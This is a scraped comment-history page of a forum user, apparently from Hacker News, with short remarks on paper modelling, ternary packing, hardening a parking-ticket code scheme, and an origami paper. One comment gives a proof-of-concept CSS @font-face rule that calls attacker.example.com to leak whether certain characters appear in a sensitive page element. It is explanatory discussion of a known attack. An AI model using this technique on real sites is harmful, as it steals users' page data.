jo-han | 6 months ago | on: 3D modeling with paper
jo-han's comments
jo-han | 1 year ago | on: How to pack ternary numbers in 8-bit bytes
Edit: probably not when easy retrieval is needed.
jo-han | 8 years ago | on: Unpaid Laborers Are 'Slipping Pleas for Help into Zara Clothes'
jo-han | 10 years ago | on: Hacking a parking ticket system
Tips to improve: f(x) = ( x * secret) mod 1000
- mod 10000 instead of mod 1000 (as mentioned in the article)
- make sure the 'x' varies between 0-9999 (e.g. by splitting the number in half and adding the parts 03001909 > 0300+1909 = 2209)
- make sure the 'secret' is larger than 10000 and non-divisible by factors of 10000 (2 and 5) (e.g.: 54321)
Pretty sure it wouldn't be so easy to hack then.
jo-han | 10 years ago | on: CSS Based Attack fontface
jo-han | 10 years ago | on: CSS Based Attack fontface
@font-face {
font-family: poc;
src: url(http://attacker.example.com/?ff); /* ff */
unicode-range: U+FB00;
}
#sensitive-information {
font-family: poc;
font-variant-ligatures: common-ligatures;
}
(edit: improved formatting/explanation)
http://origametry.net/papers/heptagon.pdf
It shows both a single sheet and a modular version.